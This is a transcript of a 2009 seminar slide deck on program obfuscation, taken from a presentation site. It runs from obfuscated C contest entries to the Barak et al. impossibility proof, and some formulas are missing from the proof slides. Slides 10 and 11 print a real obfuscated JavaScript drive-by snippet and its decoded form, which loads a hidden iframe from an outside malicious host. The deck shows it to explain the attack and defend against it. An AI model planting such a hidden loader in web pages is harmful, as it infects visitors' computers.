1 / 66

Seminar in Cryptographic Protocols: Program Obfuscation

Seminar in Cryptographic Protocols: Program Obfuscation. Omer Singer June 8, 2009. Practical Background. What is program obfuscation?. Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.

rosie
Download Presentation

Seminar in Cryptographic Protocols: Program Obfuscation

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Seminar in Cryptographic Protocols: Program Obfuscation Omer Singer June 8, 2009

  2. Practical Background

  3. What is program obfuscation? • Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do. • “The art of making things appear more complicated”

  4. What does this function do? Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

  5. Three main values: • Potency • Resilience • Cost • Many methods in use: • Modify variable names and layout • Replace integer values with complex equations • Change program flow • Modify data structures • Anti-disassembly (“armored” viruses) • Anti-debugging

  6. And now for some seriously obfuscated programs…

  7. Winner of the international C obfuscation contest in 1996 Shows the time on a clock with a configurable face and style

  8. Winner of the international C obfuscation contest in 2001 #include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(structsockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_setI;structsocka\ ddr_inil;struct host\ ent*LI; structtimevalIL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);} Network-based Pong game

  9. No more fun and games…

  10. Actual web code blocked by an Intrusion Prevention System at a client: <Script Language='Javascript'> <!-- document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E%3C%2F%54%49%54%4C%45%3E%0A%3C%2F%48%45%41%44%3E%0A%3C%42%4F%44%59%20%6C%65%66%74%6D%61%72%67%69%6E%3D%30%20%74%6F%70%6D%61%72%67%69%6E%3D%30%20%72%69%67%68%74%6D%61%72%67%69%6E%3D%30%20%62%6F%74%74%6F%6D%6D%61%72%67%69%6E%3D%30%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%30%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%30%3E%0A%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%66%73%6F%69%70%61%61%77%61%2E%63%6F%6D%2F%65%77%69%6F%71%61%2F%22%3E%3C%49%4D%47%20%73%72%63%3D%22%62%61%6E%6E%65%72%32%2E%67%69%66%22%20%77%69%64%74%68%3D%22%33%30%32%22%20%68%65%69%67%68%74%3D%22%32%35%32%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%61%3E%0A%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%78%63%7A%78%6F%2E%69%6E%66%6F%2F%6D%70%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%6E%6F%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%0A%0A%3C%2F%42%4F%44%59%3E%0A%3C%2F%48%54%4D%4C%3E')); //--> </Script>

  11. When unobfuscated… <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0> <a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a> <iframesrc="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe> </BODY> </HTML>

  12. Source: http://www.finjan.com/Content.aspx?id=1456

  13. Source: http://www.finjan.com/Content.aspx?id=1456

  14. Obfuscation helps to bypass antivirus, delay security research response • Obfuscated web code is often the first step in a “drive-by download” attack • When the web code is executed by the browser it calls programs to target local software • Result is infection of the user’s computer

  15. Source: http://viruslist.com/en/analysis?pubid=204792056

  16. Google Search Results Containing a Harmful URL Source: http://viruslist.com/en/analysis?pubid=204792056

  17. Attempt to calculate impact of obfuscated online attacks: • $13.2 billion direct damages of malware1 • 74% of malware spread via compromised websites2 • 80% of browser-based attacks are now obfuscated3 • = $7.8 billion 1 http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf 2 http://viruslist.com/en/analysis?pubid=204792056 3 http://www.securityfocus.com/brief/846

  18. Knowing is half the battle… A few tips to stop obfuscated “drive-by download” attacks • Use NoScript to block active content on Firefox • Don’t click on web ads • Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

  19. Program obfuscation has some positive uses as well!

  20. Preventing source code theft • Disrupt reverse engineering • Block code copying • Especially important with the increased use of Java and .NET languages such as C# and Visual Basic which do not compile to machine code • Microsoft recommends obfuscating ASP files in case of server compromise • Watermarking and Digital Rights Management (DRM)

  21. “If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.” - Chris Wysopal Good Obfuscation, Bad Code

  22. Definitions

  23. Oracle Access • Used by [B+] to facilitate adversary model • The oracle is some function • Adversary makes query q to the oracle, receives answer f(q) • Useful when studying obfuscation: oracle serves as an interface to the program without exposing contents

  24. Adversary with Oracle Access q q f(q) f(q) Program Adversary Oracle

  25. Virtual Black Box Anything one can efficiently compute from a virtual black box, one should be able to efficiently compute given just oracle access to the program. In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

  26. Speaks Spanish • Answers in the form of a question q Tell me about yourself f(q) ¿Quequieres saber?

  27. Adversary with access to the virtual black box Simulator with oracle access to the function

  28. Circuit In the [B+] paper on obfuscation, a circuit represents a finite length Turing machine.

  29. Circuits are easier to put in a virtual black box. • Therefore obfuscating circuits is easier than obfuscating TMs. • Proofs in the [B+] paper first prove theorems for TM then can easily extend to circuits.

  30. Obfuscators • An obfuscator is an algorithm О that will restrict what an adversary can learn about P given O(P).

  31. What is the adversary trying to achieve? • A program that produces the same output as P • A program that produces output with some relation to the output of P • A function that computes some function of P • Decide some property of P • The last achievement is the weakest, we want to prove that it is impossible.

  32. General Impossibility Proof

  33. TM Obfuscator A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

  34. Functionality: For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

  35. Polynomial slowdown: The description length and running time of O(M) are at most polynomially larger than those of M

  36. “Virtual black box” property: For any PPT A, there is a PPT S and a negligible function α such that for all TMs M

  37. Circuit Obfuscator • Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length • Hence the proposition: If a TM obfuscator exists, then a circuit obfuscator exists • Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

  38. Unobfuscatable Circuit Ensemble • A family of circuits such that: • Every circuit c in the family is efficient • There exists a predicate π(c) such that • π(c) is hard to compute with oracle access to the function that c computes • π(c) is easy to compute with access to any circuit c’ that computes the same function as c

  39. Main Proof Structure [B+] structure their Proof the Main Impossibility Result as follows: • Define obfuscators that are secure when applied to two programs • Show that such obfuscators do not exist • Modify the construction to prove that TM/circuit obfuscators do not exist • Show how this proof yields an unobfuscatable function ensemble

  40. 2-TM Obfuscator A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.

  41. Formal definition of the strengthened “virtual black box” property: Simulator with oracle access to the two TMs Adversary with access to two obfuscated TMs

  42. Proposition: According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

  43. Proof by contradiction… • Suppose that there exists a 2-TM obfuscator O. • Consider a function that cannot be learned by oracle queries, for example the following Turing machine:

  44. Define another Turing machine such that: • Consider an adversary A such that: • A (C,D) = D(C)

  45. Then for any α,β:

  46. Therefore S with oracle access to and must output 1 and with oracle access to and must output 0… but S cannot differentiate between the two so we have a contradiction.

  47. Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that: The combination of the these equations contradict the fact that O is a 2-TM obfuscator:

  48. In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.

More Related